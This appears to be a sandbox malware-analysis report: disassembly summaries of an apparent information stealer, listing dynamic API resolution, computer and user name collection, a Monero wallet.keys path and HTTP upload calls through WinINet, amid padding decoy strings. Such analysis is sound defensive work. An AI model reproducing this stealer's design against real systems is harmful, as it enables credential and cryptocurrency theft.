                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4765
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: cb3507a3fa0f733fa5a42f9e82560bdf6b70c6ecf9f5c4e1f4a8682e3db1d7d4
                                • Instruction ID: fc58132988c41ad114389dbdf67f02ed96ce885820b1c227ad43c3951c9ac1e6
                                • Opcode Fuzzy Hash: cb3507a3fa0f733fa5a42f9e82560bdf6b70c6ecf9f5c4e1f4a8682e3db1d7d4
                                • Instruction Fuzzy Hash: 994137A17C278C6BC634F7B59D4EF9D73925F4A746F907148EA6072280CBF05D005DA5
                                Function 00EC4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 ec4880-ec4942 call eda7a0 call ec47b0 call eda740 * 5 InternetOpenA StrCmpCA 816 ec494b-ec494f 801->816 817 ec4944 801->817 818 ec4ecb-ec4ef3 InternetCloseHandle call edaad0 call ec9ac0 816->818 819 ec4955-ec4acd call ed8b60 call eda920 call eda8a0 call eda800 * 2 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda920 call eda8a0 call eda800 * 2 InternetConnectA 816->819 817->816 829 ec4ef5-ec4f2d call eda820 call eda9b0 call eda8a0 call eda800 818->829 830 ec4f32-ec4fa2 call ed8990 * 2 call eda7a0 call eda800 * 8 818->830 819->818 905 ec4ad3-ec4ad7 819->905 829->830 906 ec4ad9-ec4ae3 905->906 907 ec4ae5 905->907 908 ec4aef-ec4b22 HttpOpenRequestA 906->908 907->908 909 ec4ebe-ec4ec5 InternetCloseHandle 908->909 910 ec4b28-ec4e28 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda740 call eda920 * 2 call eda8a0 call eda800 * 2 call edaad0 lstrlen call edaad0 * 2 lstrlen call edaad0 HttpSendRequestA 908->910 909->818 1021 ec4e32-ec4e5c InternetReadFile 910->1021 1022 ec4e5e-ec4e65 1021->1022 1023 ec4e67-ec4eb9 InternetCloseHandle call eda800 1021->1023 1022->1023 1024 ec4e69-ec4ea7 call eda9b0 call eda8a0 call eda800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC4915
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EE0DDB,00000000,?,?,00000000,?,",00000000,?,01B8E320), ref: 00EC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EC5
                                • HttpOpenRequestA.WININET(00000000,01B8E250,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC4B15
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction ID: 55fe9427c86c2c6351008521cb85ec8ce604c782ea5fb1cd910065eaa635e14b
                                • Opcode Fuzzy Hash: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction Fuzzy Hash: BC127F769102189ACB19EB50DCA6FEEB3B8EF54300F5451AAB50673191EF702F4ACF61
                                Function 00ED78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction ID: 90ce5dbb4e347e22fbbce409cccb523a4b0dacd0bd84d3ae19e3fa7c594dc057
                                • Opcode Fuzzy Hash: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction Fuzzy Hash: 080162B1948308EBC714DF95D945BAEBBB8FB44B15F10422BE595B3380D3B459418BA1
                                Function 00ED7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction ID: 22b15e7c101ac4eddacb07a701a78887ea9292e7df6f41d3815130b68c0861f3
                                • Opcode Fuzzy Hash: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction Fuzzy Hash: 45F04FB1D44308ABC714DF98D949BAEBBB8EB04711F10026AFA15A3780C7B515448BA1
                                Function 00EC1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction ID: 44f5244c61b6cd173d73f545067b27bd06cb9276fe300437a29988a323922afa
                                • Opcode Fuzzy Hash: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction Fuzzy Hash: CED01774D003089BCB149AA0A949A9DBB78FB08311F0015A8D90662240EA7254828BA5
                                Function 00ED9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 ed9c10-ed9c1a 634 eda036-eda0ca LoadLibraryA * 8 633->634 635 ed9c20-eda031 GetProcAddress * 43 633->635 636 eda0cc-eda141 GetProcAddress * 5 634->636 637 eda146-eda14d 634->637 635->634 636->637 638 eda216-eda21d 637->638 639 eda153-eda211 GetProcAddress * 8 637->639 640 eda21f-eda293 GetProcAddress * 5 638->640 641 eda298-eda29f 638->641 639->638 640->641 642 eda2a5-eda332 GetProcAddress * 6 641->642 643 eda337-eda33e 641->643 642->643 644 eda41f-eda426 643->644 645 eda344-eda41a GetProcAddress * 9 643->645 646 eda428-eda49d GetProcAddress * 5 644->646 647 eda4a2-eda4a9 644->647 645->644 646->647 648 eda4dc-eda4e3 647->648 649 eda4ab-eda4d7 GetProcAddress * 2 647->649 650 eda515-eda51c 648->650 651 eda4e5-eda510 GetProcAddress * 2 648->651 649->648 652 eda612-eda619 650->652 653 eda522-eda60d GetProcAddress * 10 650->653 651->650 654 eda67d-eda684 652->654 655 eda61b-eda678 GetProcAddress * 4 652->655 653->652 656 eda69e-eda6a5 654->656 657 eda686-eda699 GetProcAddress 654->657 655->654 658 eda708-eda709 656->658 659 eda6a7-eda703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(75900000,01B764E0), ref: 00ED9C2D
                                • GetProcAddress.KERNEL32(75900000,01B762C0), ref: 00ED9C45
                                • GetProcAddress.KERNEL32(75900000,01B88C40), ref: 00ED9C5E
                                • GetProcAddress.KERNEL32(75900000,01B88E20), ref: 00ED9C76
                                • GetProcAddress.KERNEL32(75900000,01B8CAC0), ref: 00ED9C8E
                                • GetProcAddress.KERNEL32(75900000,01B8CA78), ref: 00ED9CA7
                                • GetProcAddress.KERNEL32(75900000,01B7B608), ref: 00ED9CBF
                                • GetProcAddress.KERNEL32(75900000,01B8C8F8), ref: 00ED9CD7
                                • GetProcAddress.KERNEL32(75900000,01B8C880), ref: 00ED9CF0
                                • GetProcAddress.KERNEL32(75900000,01B8C820), ref: 00ED9D08
                                • GetProcAddress.KERNEL32(75900000,01B8C850), ref: 00ED9D20
                                • GetProcAddress.KERNEL32(75900000,01B76340), ref: 00ED9D39
                                • GetProcAddress.KERNEL32(75900000,01B76560), ref: 00ED9D51
                                • GetProcAddress.KERNEL32(75900000,01B76400), ref: 00ED9D69
                                • GetProcAddress.KERNEL32(75900000,01B76360), ref: 00ED9D82
                                • GetProcAddress.KERNEL32(75900000,01B8C910), ref: 00ED9D9A
                                • GetProcAddress.KERNEL32(75900000,01B8CA30), ref: 00ED9DB2
                                • GetProcAddress.KERNEL32(75900000,01B7B3D8), ref: 00ED9DCB
                                • GetProcAddress.KERNEL32(75900000,01B76460), ref: 00ED9DE3
                                • GetProcAddress.KERNEL32(75900000,01B8C928), ref: 00ED9DFB
                                • GetProcAddress.KERNEL32(75900000,01B8CAD8), ref: 00ED9E14
                                • GetProcAddress.KERNEL32(75900000,01B8CAA8), ref: 00ED9E2C
                                • GetProcAddress.KERNEL32(75900000,01B8C9A0), ref: 00ED9E44
                                • GetProcAddress.KERNEL32(75900000,01B76580), ref: 00ED9E5D
                                • GetProcAddress.KERNEL32(75900000,01B8C9B8), ref: 00ED9E75
                                • GetProcAddress.KERNEL32(75900000,01B8CA90), ref: 00ED9E8D
                                • GetProcAddress.KERNEL32(75900000,01B8C9D0), ref: 00ED9EA6
                                • GetProcAddress.KERNEL32(75900000,01B8C9E8), ref: 00ED9EBE
                                • GetProcAddress.KERNEL32(75900000,01B8C868), ref: 00ED9ED6
                                • GetProcAddress.KERNEL32(75900000,01B8CA00), ref: 00ED9EEF
                                • GetProcAddress.KERNEL32(75900000,01B8C808), ref: 00ED9F07
                                • GetProcAddress.KERNEL32(75900000,01B8CA18), ref: 00ED9F1F
                                • GetProcAddress.KERNEL32(75900000,01B8C898), ref: 00ED9F38
                                • GetProcAddress.KERNEL32(75900000,01B89D38), ref: 00ED9F50
                                • GetProcAddress.KERNEL32(75900000,01B8C940), ref: 00ED9F68
                                • GetProcAddress.KERNEL32(75900000,01B8CA48), ref: 00ED9F81
                                • GetProcAddress.KERNEL32(75900000,01B76280), ref: 00ED9F99
                                • GetProcAddress.KERNEL32(75900000,01B8C8B0), ref: 00ED9FB1
                                • GetProcAddress.KERNEL32(75900000,01B762A0), ref: 00ED9FCA
                                • GetProcAddress.KERNEL32(75900000,01B8CA60), ref: 00ED9FE2
                                • GetProcAddress.KERNEL32(75900000,01B8C7F0), ref: 00ED9FFA
                                • GetProcAddress.KERNEL32(75900000,01B763C0), ref: 00EDA013
                                • GetProcAddress.KERNEL32(75900000,01B763E0), ref: 00EDA02B
                                • LoadLibraryA.KERNEL32(01B8C838,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA03D
                                • LoadLibraryA.KERNEL32(01B8C958,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA04E
                                • LoadLibraryA.KERNEL32(01B8C8C8,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA060
                                • LoadLibraryA.KERNEL32(01B8C970,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA072
                                • LoadLibraryA.KERNEL32(01B8C8E0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA083
                                • LoadLibraryA.KERNEL32(01B8C988,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA095
                                • LoadLibraryA.KERNEL32(01B8CCA0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0A7
                                • LoadLibraryA.KERNEL32(01B8CC40,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0B8
                                • GetProcAddress.KERNEL32(75FD0000,01B767C0), ref: 00EDA0DA
                                • GetProcAddress.KERNEL32(75FD0000,01B8CC10), ref: 00EDA0F2
                                • GetProcAddress.KERNEL32(75FD0000,01B88BA0), ref: 00EDA10A
                                • GetProcAddress.KERNEL32(75FD0000,01B8CC58), ref: 00EDA123
                                • GetProcAddress.KERNEL32(75FD0000,01B76780), ref: 00EDA13B
                                • GetProcAddress.KERNEL32(73530000,01B7B158), ref: 00EDA160
                                • GetProcAddress.KERNEL32(73530000,01B76740), ref: 00EDA179
                                • GetProcAddress.KERNEL32(73530000,01B7B2E8), ref: 00EDA191
                                • GetProcAddress.KERNEL32(73530000,01B8CB68), ref: 00EDA1A9
                                • GetProcAddress.KERNEL32(73530000,01B8CC88), ref: 00EDA1C2
                                • GetProcAddress.KERNEL32(73530000,01B767A0), ref: 00EDA1DA
                                • GetProcAddress.KERNEL32(73530000,01B767E0), ref: 00EDA1F2
                                • GetProcAddress.KERNEL32(73530000,01B8CBE0), ref: 00EDA20B
                                • GetProcAddress.KERNEL32(763B0000,01B76800), ref: 00EDA22C
                                • GetProcAddress.KERNEL32(763B0000,01B76920), ref: 00EDA244
                                • GetProcAddress.KERNEL32(763B0000,01B8CCB8), ref: 00EDA25D
                                • GetProcAddress.KERNEL32(763B0000,01B8CB80), ref: 00EDA275
                                • GetProcAddress.KERNEL32(763B0000,01B76700), ref: 00EDA28D
                                • GetProcAddress.KERNEL32(750F0000,01B7B270), ref: 00EDA2B3
                                • GetProcAddress.KERNEL32(750F0000,01B7B1F8), ref: 00EDA2CB
